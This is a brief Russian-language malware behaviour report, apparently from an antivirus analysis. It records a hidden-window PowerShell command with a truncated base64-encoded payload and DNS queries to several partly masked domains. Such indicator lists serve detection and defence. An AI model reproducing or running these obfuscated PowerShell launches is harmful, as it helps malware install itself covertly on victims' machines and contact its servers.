Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABwAGEAeQBtAGUAbgB0AHQAdwB2AD0AJwBDAG8AbQBwAHUAdABlAHIAcwBfAF8ARwBhAHIAZABlAG4AagBzAGsAJwA7ACQAcAB...
- DNS ASK di###a.com.mx
- DNS ASK sv###astock.com
- DNS ASK ho##ngy.com
- DNS ASK ap###farm.it
- DNS ASK we#####ctpakistan.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABwAGEAeQBtAGUAbgB0AHQAdwB2AD0AJwBDAG8AbQBwAHUAdABlAHIAcwBfAF8ARwBhAHIAZABlAG4AagBzAGsAJwA7ACQAcAB...' (со скрытым окном)